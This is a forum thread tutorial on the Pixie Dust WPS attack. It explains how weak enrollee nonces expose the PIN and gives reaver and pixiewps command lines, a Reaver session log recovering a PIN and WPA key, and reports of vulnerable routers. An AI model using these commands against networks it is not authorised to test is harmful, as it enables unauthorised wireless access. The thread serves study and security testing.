
[TUT] Pixie Dust Attack with Pixiewps


hash-ire

Status: n/a
Joined: Mon, 19 Aug 2013
Posts: 257
Team:
Reputation: 308 Reputation
Offline
Fri, 03 Apr 2015 @ 11:09:24

DISCLAIMER: this tutorial has been made for education purposes only.

A bit of background first. The Pixie Dust Attack is a WPS attack aimed at cracking the PIN offline, exploiting the non-existent or low entropy of some APs. This vulnerability was discovered by Dominique Bongard. All credits for the research go to him.

Sources:


The roles of the devices in a common WPS transaction are:
- Registrar: client/attacker
- Enrollee: access point

Let's have a look at part of the information exchanged between the two (|| means concatenation):
- Enrollee -> Registrar: M1 (E-Nonce || description || PKE)
- Registrar -> Enrollee: M2 (E-Nonce || R-Nonce || description || PKR)
- Enrollee -> Registrar: M3 (R-Nonce || E-Hash1 || E-Hash2)

PKE: Public Key Enrollee (g^A mod p)
PKR: Public Key Registrar (g^B mod p)
E-Nonce: Enrollee Nonce
R-Nonce: Registrar Nonce

And now comes the interesting part:
- E-Hash1: HMAC{AuthKey}(ES-1 || PSK1 || PKE || PKR)
- E-Hash2: HMAC{AuthKey}(ES-2 || PSK2 || PKE || PKR)

PSK1 is a truncated hash of the first 4 digits of the WPS pin
PSK2 is a truncated hash of the last 4 digits of the WPS pin

In the M3 packet the AP proves to us that it knows the first half of the pin (with E-Hash1) and the second half (with E-Hash2). Of those two hashes we know everything except PSK1 and ES-1, and PSK2 and ES-2, respectively.
- PSK1 and PSK2 need only 10,000 + 1,000 guesses to find (if the last digit is used as a checksum, or 20,000 if not).
- ES-1 and ES-2 are two 128-bit random nonces, which would be impossible to bruteforce, right?

The question now is: how are they generated? Are they truly random? No, not for every AP/manufacturer at least. Bongard looked at two implementations: Ralink and Broadcom.
- The former uses ES-1 = ES-2 = 0 (constant), so we just need to bruteforce the PIN with 11,000 guesses.
- The latter has the code of its random function publicly hosted online on GitHub (lol). It will work only for some old devices, though (probably those shipped from 2011 to 2013).

It uses the r_rand() function from C (which is not secure), which uses a Linear Congruential Generator, and its entropy is only 25 bits (instant to bruteforce).
ES-1 is calculated after the E-Nonce, so you just need to guess the seed (25 bits of entropy) until you find the same sequence that leads to the E-Nonce. That's it.

Now, aside from those two manufacturers, it is also important to mention that the majority of APs (if not all) use 32-bit pseudo-random number generators and have low entropy at boot. So more vulnerabilities are out there; they just need to be discovered by someone.

Now let's talk about the tool, pixiewps.

Credits to wiire for his wonderful tool. I'll quote his post to describe it best:

wiire said:

Description: Pixiewps is a tool written in C used to bruteforce offline the WPS pin exploiting the low or non-existing entropy of some APs (pixie dust attack). It is meant for educational purposes only. All credits for the research go to Dominique Bongard.
License: GNU GPLv3

Features:
- Checksum optimization: it'll try valid PINs first (11'000).
- Reduced entropy of the seed from 32 to 25 bits for the C LCG random function.
- Small Diffie-Hellman keys: you don't need to specify the Public Registrar Key if the same option is used with Reaver.

The program will also try first with E-S0 = E-S1 = 0, then it'll try to bruteforce the seed of the PRNG if the --e-nonce option is specified.

Also thanks to soxrok2212 who made a very nice tutorial: youtu.be/_sbdQMH8cQ8. On the description there's a link to the modified version of reaver-forked to display all the useful information (except PKR).

I'd appreciate feedback, bug reports and improvement suggestions, but please don't ask me:
- to work on a modified version of Reaver/Bully
- to send you data of some vulnerable devices
- to make a list of vulnerable devices

Thanks to everyone who stepped (or will step) into this project, especially those who helped me out.

To gather all the data needed we need a modified version of Reaver/Bully. In the post of wiire there's a YouTube video with the link to said modified version. Actually, the only piece of information that we would need to carry out this attack is the AuthKey (--authkey). All the other data can be gathered from Wireshark, but if Reaver prints it out for us it makes our life so much easier.

The tool has the small Diffie-Hellman keys option (-S, --dh-small) and, if used, the Registrar Public Key is not needed. Otherwise you have to start the attack while recording or monitoring the WPS session with Wireshark (just type EAPOL as filter) and then gather it from the M2 message under Public Key, as the modified version of Reaver doesn't print it.

This was just to introduce the tool and to post a sort of guide to make you start using the program. Sorry if it's a bit messed up, I may clean it up a bit later. Meanwhile have fun testing!
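As an added example that is not code from this thread or from pixiewps: the Python below derives the WPS values the post names (PIN checksum digit, PSK1/PSK2, E-Hash) and shows why a constant E-S1 leaves a 4-digit half-PIN as the only unknown in E-Hash1, and why the checksum digit gives 11,000 rather than 20,000 guesses. AuthKey, PKE and PKR are constructed stand-ins, not captured values.

```python
import hashlib
import hmac
import os

# Constructed stand-ins for one captured WPS session (not real captures).
AUTHKEY = hashlib.sha256(b"constructed AuthKey").digest()   # 256-bit AuthKey
PKE = hashlib.sha256(b"constructed PKE").digest() * 6        # 192 bytes, 1536-bit DH
PKR = hashlib.sha256(b"constructed PKR").digest() * 6
ZERO_ES = bytes(16)                                           # Ralink: E-S1 = E-S2 = 0

def wps_checksum(first7: str) -> int:
    """Checksum digit over the first seven PIN digits (WPS spec): digits at
    odd positions (1st, 3rd, ...) weigh 3, the others 1."""
    acc = sum((3 if i % 2 == 0 else 1) * int(ch) for i, ch in enumerate(first7))
    return (10 - acc % 10) % 10

def is_valid_wps_pin(pin: str) -> bool:
    return len(pin) == 8 and pin.isdigit() and int(pin[7]) == wps_checksum(pin[:7])

def half_pin_search_space(checksum_used: bool) -> int:
    """Guesses needed when M3 lets each half be verified separately.
    First half: 10^4 values. Second half: 10^3 when its last digit is a
    checksum fixed by the other seven, else 10^4. The halves add, not multiply."""
    return 10_000 + (1_000 if checksum_used else 10_000)

def derive_psk(authkey: bytes, pin_half: str) -> bytes:
    """PSKn = first 128 bits of HMAC-SHA256(AuthKey, pin half as ASCII)."""
    return hmac.new(authkey, pin_half.encode("ascii"), hashlib.sha256).digest()[:16]

def e_hash(authkey: bytes, es: bytes, psk: bytes, pke: bytes, pkr: bytes) -> bytes:
    """E-Hashn = HMAC-SHA256(AuthKey, E-Sn || PSKn || PKE || PKR)."""
    return hmac.new(authkey, es + psk + pke + pkr, hashlib.sha256).digest()

def zero_es() -> bytes:
    return ZERO_ES                 # the weak implementation described in the post

def fresh_es() -> bytes:
    return os.urandom(16)          # what a sound enrollee does: 128 fresh bits

def e_hash_fixed_by_half_pin(pin_half: str, es_source) -> bool:
    """Compute E-Hash1 twice for one half-PIN with E-S1 drawn from es_source,
    holding AuthKey/PKE/PKR constant to isolate the nonce. Equal hashes mean
    E-Hash1 commits only to the 4-digit half: a 10^4 search space."""
    psk1 = derive_psk(AUTHKEY, pin_half)
    first = e_hash(AUTHKEY, es_source(), psk1, PKE, PKR)
    second = e_hash(AUTHKEY, es_source(), psk1, PKE, PKR)
    return first == second

if __name__ == "__main__":
    print("12345670 valid:", is_valid_wps_pin("12345670"))
    print("guesses with checksum digit:", half_pin_search_space(True))
    print("zero E-S1, hash fixed by half-PIN:", e_hash_fixed_by_half_pin("1234", zero_es))
    print("random E-S1, hash fixed by half-PIN:", e_hash_fixed_by_half_pin("1234", fresh_es))
```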


ziggycat

Status: n/a
Joined: Wed, 18 Mar 2015
Posts: 48
Team:
Reputation: 42 Reputation
Offline
Fri, 03 Apr 2015 @ 16:42:13

fab post mate... I'll have a play with this over the weekend... thanks for taking the effort to write up a tutorial.


flyinghaggis

Status: Trusted
Joined: Wed, 19 Feb 2014
Posts: 536
Team:
Reputation: 622 Reputation
Offline
Fri, 03 Apr 2015 @ 16:45:53

Aye, soxrok2212 was one of the first to attempt anything with/understand this after it was first published by Bongard (but he, Bongard, wasn't releasing anything).

There were several others who also contributed to this, but yes, hats off to soxrok2212 for highlighting it and getting it off the ground.

Rab.

BTC: 19b8m63qe2hMchz7BBgyGudNPpTycJcRAQ

blandyuk
Admin / Owner
Status: Trusted
Joined: Tue, 05 Jul 2011
Posts: 3031
Team: HashKiller
Reputation: 4050 Reputation
Offline
Fri, 03 Apr 2015 @ 18:48:28

This looks very good. I have made it a sticky topic so will be available at the top of the forum.



Please read the forum rules | Please read the paid section rules
I accept private hash lists, with forum donations only.
BTC: 15qF9WUeFUD63ishxyAMiEgGqTcYzk4j9b
GPU Power: 9x GTX 1070 + 4x GTX 1080

jugganuts420

Status: n/a
Joined: Sat, 21 Feb 2015
Posts: 318
Team:
Reputation: 317 Reputation
Offline
Fri, 03 Apr 2015 @ 20:22:51

Great, I'm glad to see it be released!

But I am getting errors compiling. Is anyone else? Or am I just forgetting some dependencies? Running Ubuntu 14.04.2.

gcc -lssl -lcrypto -Wall -Werror pixiewps.c -o pixiewps
/tmp/ccte99U1.o: In function `hmac_sha256':
pixiewps.c:(.text+0xf1c): undefined reference to `HMAC_CTX_init'
pixiewps.c:(.text+0xf21): undefined reference to `EVP_sha256'
pixiewps.c:(.text+0xf46): undefined reference to `HMAC_Init_ex'
pixiewps.c:(.text+0xf66): undefined reference to `HMAC_Update'
pixiewps.c:(.text+0xf86): undefined reference to `HMAC_Final'
pixiewps.c:(.text+0xf95): undefined reference to `HMAC_CTX_cleanup'
collect2: error: ld returned 1 exit status
make: *** [all] Error 1


+rep if i helped :)

hash-ire

Status: n/a
Joined: Mon, 19 Aug 2013
Posts: 257
Team:
Reputation: 308 Reputation
Offline
Fri, 03 Apr 2015 @ 20:31:42

jugganuts420 said:

Great, I'm glad to see it be released!

But I am getting errors compiling. Is anyone else? Or am I just forgetting some dependencies? Running Ubuntu 14.04.2.

gcc -lssl -lcrypto -Wall -Werror pixiewps.c -o pixiewps
/tmp/ccte99U1.o: In function `hmac_sha256':
pixiewps.c:(.text+0xf1c): undefined reference to `HMAC_CTX_init'
pixiewps.c:(.text+0xf21): undefined reference to `EVP_sha256'
pixiewps.c:(.text+0xf46): undefined reference to `HMAC_Init_ex'
pixiewps.c:(.text+0xf66): undefined reference to `HMAC_Update'
pixiewps.c:(.text+0xf86): undefined reference to `HMAC_Final'
pixiewps.c:(.text+0xf95): undefined reference to `HMAC_CTX_cleanup'
collect2: error: ld returned 1 exit status
make: *** [all] Error 1

You need to install openssl. Try: sudo apt-get install libssl-dev.


jugganuts420

Status: n/a
Joined: Sat, 21 Feb 2015
Posts: 318
Team:
Reputation: 317 Reputation
Offline
Fri, 03 Apr 2015 @ 20:34:36

hash-ire said:

jugganuts420 said:

Great, I'm glad to see it be released!

But I am getting errors compiling. Is anyone else? Or am I just forgetting some dependencies? Running Ubuntu 14.04.2.

gcc -lssl -lcrypto -Wall -Werror pixiewps.c -o pixiewps
/tmp/ccte99U1.o: In function `hmac_sha256':
pixiewps.c:(.text+0xf1c): undefined reference to `HMAC_CTX_init'
pixiewps.c:(.text+0xf21): undefined reference to `EVP_sha256'
pixiewps.c:(.text+0xf46): undefined reference to `HMAC_Init_ex'
pixiewps.c:(.text+0xf66): undefined reference to `HMAC_Update'
pixiewps.c:(.text+0xf86): undefined reference to `HMAC_Final'
pixiewps.c:(.text+0xf95): undefined reference to `HMAC_CTX_cleanup'
collect2: error: ld returned 1 exit status
make: *** [all] Error 1

You need to install openssl. Try: sudo apt-get install libssl-dev.

libssl-dev is already the newest version (it's already installed).


+rep if i helped :)

hash-ire

Status: n/a
Joined: Mon, 19 Aug 2013
Posts: 257
Team:
Reputation: 308 Reputation
Offline
Fri, 03 Apr 2015 @ 21:10:13

jugganuts420 said:

libssl-dev is already the newest version (it's already installed).

Then you have to link the libraries when compiling. Just google for it.


hashtka

Status: Trusted
Joined: Wed, 15 May 2013
Posts: 2015
Team: egy.Z0nE
Reputation: 4037 Reputation
Offline
Sat, 04 Apr 2015 @ 05:50:35


perfect tool


BTC:1PSRYuzqQ9cguLGTULe1vyzYa4TG9fvuzb

hash-ire

Status: n/a
Joined: Mon, 19 Aug 2013
Posts: 257
Team:
Reputation: 308 Reputation
Offline
Sat, 04 Apr 2015 @ 10:06:10

hash-ire said:

jugganuts420 said:

libssl-dev is already the newest version (it's already installed).

Then you have to link the libraries when compiling. Just google for it.


Ok, ignore my last post. Apparently there's an error in the Makefile. Dependencies are reversed on the command line, so something that depends on something else should actually be put before what it depends on, on the command line.

Try replacing the existing Makefile with this one.

Attachments don't seem to work for me.

The youtube video has been reuploaded in HD. So the link's changed.


hash-ire

Status: n/a
Joined: Mon, 19 Aug 2013
Posts: 257
Team:
Reputation: 308 Reputation
Offline
Sat, 04 Apr 2015 @ 18:32:45

The issue has been reported and fixed. Should compile fine now on Ubuntu.


harryboberries

Status: n/a
Joined: Fri, 03 Apr 2015
Posts: 169
Team:
Reputation: 212 Reputation
Offline
Sun, 05 Apr 2015 @ 20:40:40

New to posting in the Forums, but have been reading this forum for some time. I have also been aware of hashcat killer GUI for over a year.
I love the forums and the tools provided. I want to help where I can and provide additional information.

I've been anticipating the release of PixieWPS for nearly a month and got straight to work this weekend. I have tested 3 Broadcom devices so far, but none appear to be vulnerable. I think I've got everything entered correctly.

I'm running a "reaver -i mon0 -c x -b xx:xx:xx:xx:xx:xx -vv" command against the AP. I think the -S command is only used for Ralink.

I'm running a "pixiewps -e PKE -r PKR -s E-Hash1 -z E-Hash2 -a AuthKey -n E-Nonce" command in PixieWPS.
I am of course using the key information provided by Reaver in the appropriate fields.
I've obtained the PKR value from the M2 message in Wireshark, using edit -> copy -> value.

I understand this may not be the appropriate place to attach my findings, but again I have 3 APs that I would like to add to the Excel data.
If anyone will tell me where to post this information, I would be grateful. I do greatly appreciate this tool and know it will become better over time.
A big thanks to all that have contributed.


4x R9 280x Windforce - BTC 1JGDEge8inRr877KYkrj97uTjZsC6Tz29C

hash-ire

Status: n/a
Joined: Mon, 19 Aug 2013
Posts: 257
Team:
Reputation: 308 Reputation
Offline
Mon, 06 Apr 2015 @ 18:04:52

harryboberries said:

I've been anticipating the release of PixieWPS for nearly a month and got straight to work this weekend. I have tested 3 Broadcom devices so far, but none appear to be vulnerable. I think I've got everything entered correctly.

Only a few old Broadcoms are vulnerable (probably those shipped between 2011 and 2013, BCM3xxx?).

harryboberries said:

I'm running a "reaver -i mon0 -c x -b xx:xx:xx:xx:xx:xx -vv" command against the AP. I think the -S command is only used for Ralink.

I'm running a "pixiewps -e PKE -r PKR -s E-Hash1 -z E-Hash2 -a AuthKey -n E-Nonce" command in PixieWPS.

You can avoid using PKR ('-r' or '--pkr') for ANY device if you use '-S' (or '--dh-small') in BOTH Reaver and Pixiewps. I've written it also in my post.

harryboberries said:

I've obtained the PKR value from the M2 message in Wireshark, using edit -> copy -> value.

Be sure to get the right one. Values change (in general) in different sessions.

harryboberries said:

I understand this may not be the appropriate place to attach my findings, but again I have 3 APs that I would like to add to the Excel data.
If anyone will tell me where to post this information, I would be grateful. I do greatly appreciate this tool and know it will become better over time.
A big thanks to all that have contributed.

You can send me a PM. I can contact the 'crew'. Or send an email to soxrok2212@gmail.com or comment his video.


hash-ire

Status: n/a
Joined: Mon, 19 Aug 2013
Posts: 257
Team:
Reputation: 308 Reputation
Offline
Fri, 10 Apr 2015 @ 23:23:33

Pixiewps 1.0.5 is out!

Added a partial implementation for Realtek based APs. It may work only with some for now. Check the Kali forum and wiire's repository for more info.


t6_x

Status: n/a
Joined: Mon, 13 Apr 2015
Posts: 2
Team:
Reputation: 0 Reputation
Offline
Mon, 13 Apr 2015 @ 00:31:53

Hello

I made a modification to reaver for it to do the pixiedust attack when testing a pin number.

Here's my contribution

GitHub

https://github.com/t6x/reaver-wps-fork-t6x


Example


Reaver v1.5.1 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner cheffner@tacnetsol.com
mod by t6_x t6_x@hotmail.com

[+] Switching mon0 to channel 1
[?] Restore previous session for A.:9..:....:....:...? [n/Y] n
[+] Waiting for beacon from A.:9..:....:....:...
[+] Associated with A.:9..:....:....:.... (ESSID: ......)
[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: c6:66:a6:72:37:6d:........
[P] PKE: 10:cf:cc:88:99:4b:15:de:a6:b3:26:fe:93:24:........
[P] WPS Manufacturer: Ralink Technology, Corp.
[P] WPS Model Number: RT2860
[+] Received M1 message
[P] PKR: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:........
[P] AuthKey: bf:68:34:b5:ce:e2:a1:24:dc:15:01:1c:78:9e:74:.......
[+] Sending M2 message
[P] E-Hash1: 2e:d5:17:16:36:b8:c2:bb:d1:14:7c:18:cf:89:58:b8:1d:9d:39:......
[P] E-Hash2: 94:fb:41:53:55:b3:8e:1c:fe:2b:a3:9b:b5:82:11:......
[Pixie-Dust]
[Pixie-Dust]   ES-1: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
[Pixie-Dust]   ES-2: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
[Pixie-Dust]   PSK1: dd:09:bd:24:..........
[Pixie-Dust]   PSK2: 77:e0:dd:00:........
[Pixie-Dust] [+] WPS pin: 9178....
[Pixie-Dust]
[Pixie-Dust]   Time taken: 0 s
[Pixie-Dust]
Running the reaver with the correct pin wait ...

[Reaver Test] BSSID: A.:9..:3.:..:..
[Reaver Test] Channel: 1
[Reaver Test] [+] WPS PIN: '9178....'
[Reaver Test] [+] WPA PSK: '112233'
[Reaver Test] [+] AP SSID: '....'


For any problem or suggestion, please contact me.


soxrok2212

Status: Cracker
Joined: Sat, 24 Oct 2015
Posts: 451
Team:
Reputation: 421 Reputation
Offline
Sat, 24 Oct 2015 @ 19:33:12

Hey all, wondering if anyone has looked into
Intel: https://wikidevi.com/wiki/Intel
Marvell: https://wikidevi.com/wiki/Marvell
TrendChip: https://wikidevi.com/wiki/TrendChip

I'm pretty sure Marvell chips are Linux based so I don't expect much from that, but apparently there are a few Intel and TrendChip devices floating around out there that I'd like to peek into if you guys have access to them.


BTC: 1B4ZAbWYQ399p6QJm3VLbywiCWVSBAXYJ1

NVIDIA
1x GTX 1080 Founder's Edition
1x GTX 980 Reference Design

dallibab

Status: n/a
Joined: Fri, 29 Jul 2016
Posts: 4
Team:
Reputation: 0 Reputation
Offline
Wed, 10 Aug 2016 @ 00:31:46

Messing around with my neighbour's bthomehub 5 (with permission), ran reaver with pixie dust and got the WPA key straight away.

Tried again a couple of days later but it didn't work; changed my mac address and bang, worked again.

Are the keys / serials any good to anyone working on these hubs? Didn't think WPS attacks should work on a router this new.

Thanks


cheeseuk1989

Status: n/a
Joined: Sun, 03 May 2015
Posts: 39
Team:
Reputation: 10 Reputation
Offline
Fri, 12 Aug 2016 @ 21:47:00

dallibab said:

Messing around with my neighbour's bthomehub 5 (with permission), ran reaver with pixie dust and got the WPA key straight away.

Tried again a couple of days later but it didn't work; changed my mac address and bang, worked again.

Are the keys / serials any good to anyone working on these hubs? Didn't think WPS attacks should work on a router this new.

Thanks

What reaver commands did you use to get the keys?


nikon1982

Status: n/a
Joined: Fri, 25 Dec 2015
Posts: 21
Team:
Reputation: 0 Reputation
Offline
Thu, 15 Sep 2016 @ 21:43:40

Pixiewps: pin not found, why?

Here are the report files from reaver:

http://rgho.st/86HYVbB9B

http://rgho.st/8LD7qMBBC



semutapi

Status: n/a
Joined: Tue, 27 Sep 2016
Posts: 7
Team:
Reputation: 0 Reputation
Offline
Tue, 27 Sep 2016 @ 21:11:06

Thanks. I will try it. hee


Hosehead1

Status: n/a
Joined: Tue, 11 Oct 2016
Posts: 5
Team:
Reputation: 0 Reputation
Offline
Tue, 11 Oct 2016 @ 05:28:07

Ahem... has anyone EVER had results from the full PRNG bruteforce? I ask because that option does not exist in the pixiewps currently in Kali's repository, nor in the AAnarchYY fork for that matter. The -f switch which used to do "full PRNG bruteforce" now denotes "Disable channel hopping". If it was a good feature why was it removed, and/or how do we get it back?

PS: Attn nikon1982 - both your files are gone off rghost... ?


Antony_Sawyer

Status: n/a
Joined: Sat, 19 Nov 2016
Posts: 6
Team:
Reputation: 0 Reputation
Offline
Mon, 21 Nov 2016 @ 09:44:37

I have to try this!


dark0

Status: n/a
Joined: Tue, 13 Feb 2018
Posts: 44
Team:
Reputation: 10 Reputation
Offline
Thu, 15 Feb 2018 @ 01:53:32

Yes, but for this to work you may need to be close enough to the access point! Or use an alpha card!


vtar

Status: n/a
Joined: Wed, 07 Mar 2018
Posts: 126
Team:
Reputation: 6 Reputation
Online
Sat, 19 May 2018 @ 10:31:55

It just doesn't work against TP-Link Archer C1200.


freeroute
Moderator
Status: Trusted
Joined: Sat, 16 Jul 2016
Posts: 2302
Team:
Reputation: 7782 Reputation
Online
Sat, 09 Jun 2018 @ 22:31:40

TP-Link Wireless N Router WR840N is vulnerable.

Firmware Version: 0.9.1 3.16 v0001.0 Build 170608 Rel.58696n
Hardware Version: TL-WR840N v5 00000005


If I helped a +rep is appreciated!

: 13hDMK85KhVnPb2eTFBacHD6kDjKYFLudb
XMPP: freeroute@xmpp.jp

vtar

Status: n/a
Joined: Wed, 07 Mar 2018
Posts: 126
Team:
Reputation: 6 Reputation
Online
Wed, 22 Aug 2018 @ 03:38:57

Unfortunately, TP-LINK Archer C1200 is not vulnerable.


